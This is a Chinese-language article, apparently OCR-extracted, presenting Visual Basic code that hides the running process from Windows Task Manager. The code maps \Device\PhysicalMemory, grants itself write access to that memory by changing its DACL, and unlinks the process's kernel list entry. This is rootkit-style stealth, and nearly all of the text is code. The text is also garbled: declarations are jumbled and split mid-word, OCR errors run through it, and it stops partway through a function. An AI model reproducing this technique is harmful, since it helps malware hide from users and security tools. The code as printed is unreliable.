vb中如何在任务管理器里面隐藏应用程序进程

1、vb中如何在任务管理器里面隐藏应用程序进程该模块用于在任务管理器中隐藏进程Private Const STATUS_INFO_LENGTH_MISMATCH= &H C0000004Private Const STATUS_ACCESS_DENIED= &H C0000022Private Const STATUS_INVA LI D_HANDLE= &H C0000008Private Const ERROR_SUCCESS = 0 &Private Const SECTION_MAP_WRITE= &H2Private Const SECTION_MAP_READ= &H4Private

2、Const READ_CONTROL = & H20000Private Const WRITE_DAC = &H40000Private Const NO_INHERITANCE= 0Private Const DACL_SECURITY_INFORMATION= &H4Private Type IO_STATUS_BLOCKStatus As LongInformation As LongEnd TypePrivate Type UNICODE_STRINGLength As IntegerMaximumLength As IntegerBuffer As LongEnd TypePriv

3、ate Const OBJ INHERIT = &H2&H10=&H40& H200=&H 3F2Private Const OBJ_PERMANENTPrivate Const OBJ_EXCLUSIVE = &H20Private Const OBJ_CASE_INSENSITIVEPrivate Const OBJ_OPENIF = &H80Private Const OBJ_OPENLINK = &H 100Private Const OBJ_KERNEL_HANDLE=Private Const OBJ_VALID_ATTRIBUTESPrivate Type OBJECT_ATTR

4、IBUTESLength As LongRootDirectory As LongObjectName As LongAttributes As LongSecurityDeor As LongSecurityQualityOfService As LongEnd TypePrivate Type ACLAclRevision As ByteSbz1 As ByteAclSize As IntegerAceCount As IntegerSbz2 As IntegerEnd TypePrivate Enum ACCESS_MODENOT_USED_ACCESSGRANT_ACCESSSET_A

5、CCESSDENY_ACCESSREVOKE_ACCESSSET_AUDIT_SUCCESSSET_AUDIT_FAILUREEnd EnumPrivate Enum MULTIPLE_TRUSTEE_OPERATIONNO_MULTIPLE_TRUSTEETRUSTEE_IS_IMPERSONATEEnd EnumPrivate Enum TRUSTEE_FORMTRUSTEE_IS_SIDTRUSTEE_IS_NAMEEnd EnumPrivate Enum TRUSTEE_TYPETRUSTEE_IS_UNKNOWNTRUSTEE_IS_USERTRUSTEE_IS_GROUPEnd E

6、numPrivate Type TRUSTEEpMultipleTrustee As LongMultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATIONTrusteeForm As TRUSTEE_FORMTrusteeType As TRUSTEE_TYPEptstrName As StringEnd TypePrivate Type EXP LI CIT_ACCESS grfAccessPermissions As Long grfAccessMode As ACCESS_MODE grfInheritance As LongTRUSTEE

7、 As TRUSTEEEnd TypePrivate Type AceArrayList () As EXPLICIT_ACCESSEnd TypePrivate Enum SE_OBJECT_TYPESE_UNKNOWN_OBJECT_TYPE = 0 SE_FILE_OBJECTSE_SERVICESE_PRINTERSE_REGISTRY_KEYSE_LMSHARESE_KERNEL_OBJECTSE_WINDOW_OBJECTSE_DS_OBJECTSE_DS_OBJECT_ALLSE_PROVIDER_DEFINED_OBJECTSE_WMIGUID_OBJECTEnd EnumPr

8、ivate Declare Function GetSecurityInfo Libadvapi32.dll(ByVal Handle As Long,ByValAs Long , ppsidGroup As Long,ppDacl As Any , ppSacl As Any,ppSecurityDeor As Long)AsLongPrivate Declare Function SetEntriesInAcl Libadvapi32.dll Alias SetEntriesInAclA(ByVal,pListOfExplicitEntries As,ByVal AccessMode As

9、Private Declare Sub RtlInitUnicodeString LibNTDLL.DLL(DestinationString AsPrivate Declare Function ZwOpenSection LibNTDLL.DLL(SectionHandle As Long,ByValDesiredAccess As Long , ObjectAttributes As Any)As LongPrivate DeclareFunction LocalFree Lib kernel32 (ByVal hMem As Any ) As LongPrivate DeclareFu

10、nction CloseHandle Lib kernel32 (ByVal hObject As Long)As LongPrivate Declare Function SetSecuritylnfo Libadvapi32.dll (ByVal Handle As Long , ByValAs Long , ppsidGroup As Long , ppDacl As Any , ppSacl As Any ) As LongObjectType As SE_OBJECT_TYPE , ByVal SecurityInfo As Long , ppsidOwnercCountOfExpl

11、icitEntries As LongEXP LI CIT_ACCESS , ByVal OldAcl As Long , NewAcl As Long ) As LongPrivate Declare Sub BuildExplicitAccessWithName Libadvapi32.dll AliasBuildExplicitAccessWithNameA(pExplicitAccess As EXPLICIT_ACCESS , ByValpTrusteeName As String , ByVal AccessPermissions As LongACCESS_MODE , ByVa

12、l Inheritance As Long )UNICODE_STRING , ByVal SourceString As Long )Private Declare Function MapViewOfFile Lib kernel32 (ByVal hFileMappingObject As LongObjectType As SE_OBJECT_TYPE,ByVal SecurityInfo As Long,ppsidOwner转载请注名来自爱软件()阿江编注ByVai dwDesiredAccess As Long,ByVai dwFileOffsetHigh As Long,ByVa

13、ldwFileOffsetLow As Long , ByVal dwNumberOfBytesToMap As Long) As LongPrivate Declare Function UnmapViewOfFile Lib kernel32 (lpBaseAddress As Any ) As LongPrivate Declare Sub CopyMemory Libkernel32 Alias RtlMoveMemory (Destination As AnySource As Any , ByVal Length As Long )Private Declare Function

14、GetVersionEx Lib kernel32 Alias GetVersionExA(IpVersionlnformation As OSVERSIONINFO) As LongPrivate Type OSVERSIONINFOdwOSVersionInfoSize As LongdwMajorVersion As LongdwMinorVersion As LongdwBuildNumber As LongdwPlatformId As LongszCSDVersion As String * 128End TypePrivate verinfo As OSVERSIONINFOPr

15、ivate g_hNtDLL As LongPrivate g_pMapPhysicalMemory As LongPrivate g_hMPM As LongPrivate aByte (3) As BytePublic Sub HideCurrentProcess ()在进程列表中隐藏当前应用程序进程Dim thread As Long , process As Long , fw As Long , bw As LongDim lOffsetFlink As Long , lOffsetBlink As Long , lOffsetPID As Longverinfo .dwOSVers

16、ionlnfoSize = Len (verinfo )If ( GetVersionEx (verinfo ) 0 ThenIf verinfo .dwPlatformld = 2 ThenIf verinfo .dwMajorVersion = 5 ThenSelect Case verinfo .dwMinorVersionCase 0lOffsetFlink= &HA0lOffsetBlink= &HA4lOffsetPID = &H9CCase 1lOffsetFlink= &H88lOffsetBlink= &H8ClOffsetPID = &H84End SelectEnd If

17、End IfEnd IfIf OpenPhysicalMemory 0 Thenthread = GetData (& HFFDFF124 )process = GetData (thread + &H44 )fw = GetData (process + lOffsetFlink )bw = GetData (process + lOffsetBlink )SetData fw + 4 , bwSetData bw , fwCloseHandle g_hMPMEnd IfEnd SubPrivate Sub SetPhyscialMemorySectionCanBeWrited(ByVai

18、hSection As Long )Dim pDaci As LongDim pNewDaci As LongDim pSD As LongDim dwRes As LongDim ea As EXPLICIT_ACCESSGetSecurityInfo hSection , SE_KERNEL_OBJECT , DACL_SECURITY_INFORMATION , 0 , 0 , pDaci , 0 , pSDea . grfAccessPermissions = SECTION_MAP_WRITEea . grfAccessMode = GRANT_ACCESSea . grfInher

19、itance = NO_INHERITANCEea . TRUSTEE . TrusteeForm = TRUSTEE_IS_NAMEea . TRUSTEE . TrusteeType = TRUSTEE_IS_USERea . TRUSTEE . ptstrName = CURRENT_USER & vbNuilCharSetEntriesInAci 1, ea , pDaci , pNewDaciSetSecurityInfo hSection , SE_KERNEL_OBJECT , DACL_SECURITY_INFORMATION , 0 , 0 ,ByVai pNewDaci ,

20、 0CieanUp :LocaiFree pSDLocalFree pNewDacIEnd Sub转载请注名来自爱软件() 阿江编注。Private Function OpenPhysicalMemory () As LongDim Status As LongDim PhysmemString As UNICODE_STRINGDim Attributes As OBJECT_ATTRIBUTESRtlInitUnicodeString PhysmemString, StrPtr (DevicePhysicalMemory )Attributes .Length = Len (Attribu

21、tes )Attributes . RootDirectory = 0Attributes . ObjectName = VarPtr (PhysmemString )Attributes .Attributes = 0Attributes . SecurityDeor = 0Attributes . SecurityQualityOfService = 0Status = ZwOpenSection (g_hMPM , SECTION_MAP_READ or SECTION_MAP_WRITEAttributes )If Status = STATUS_ACCESS_DENIED ThenS

22、tatus = ZwOpenSection (g_hMPM , READ_CONTROL or WRITE_DAC , Attributes )SetPhyscialMemorySectionCanBeWrited g_hMPMCloseHandle g_hMPMStatus = ZwOpenSection (g_hMPM , SECTION_MAP_READ or SECTION_MAP_WRITEAttributes )End IfDim lDirectoty As Longverinfo .dwOSVersionlnfoSize=Len (verinfo )If ( GetVersion

23、Ex (verinfo) 0 ThenIf verinfo .dwPlatformld = 2 ThenIf verinfo .dwMajorVersion=5 ThenSelect Case verinfo .dwMinorVersionCase 0lDirectoty= &H30000Case 1lDirectoty= &H39000End SelectEnd IfEnd IfEnd IfIf Status = 0 Theng_pMapPhysicalMemory=MapViewOfFile (g_hMPM , 4, 0 , lDirectoty ，&H1000 )If g_pMapPhy

24、sicalMemory 0 Then OpenPhysicalMemory= g_hMPMEnd IfEnd FunctionPrivate Function LinearToPhys (BaseAddress As Long , addr As Long ) As LongDim VAddr As Long , PGDE As Long , PTE As Long , PAddr As LongDim lTemp As LongVAddr = addrCopyMemory aByte (0), VAddr , 4 lTemp = Fix (ByteArrToLong (aByte )/(2

25、A 22 )PGDE = BaseAddress + ITemp * 4CopyMemory PGDE ,ByVal PGDE , 4If ( PGDE And 1) 0 ThenlTemp = PGDE And&H80If lTemp 0 ThenPAddr = (PGDE And&H FFC00000 ) + (VAddr And&H3FFFFF )ElsePGDE = MapViewOfFile (g_hMPM , 4 , 0 , PGDE And&HFFFFF000 , & H1000 )lTemp = (VAddr And&H3FF000 )/(2 人 12 )PTE = PGDE + lTemp* 4CopyMemory PTE , ByVal PTE , 4If ( PTE And 1 ) 0 ThenPAddr = (PTE And &HFFFFFOOO ) + (VAddr And&HFFF)UnmapViewOfFile PGDEEnd IfEnd IfEnd IfLinearToPhys = PAddrEnd FunctionPrivate Function GetData (addr As Long ) As LongDim phys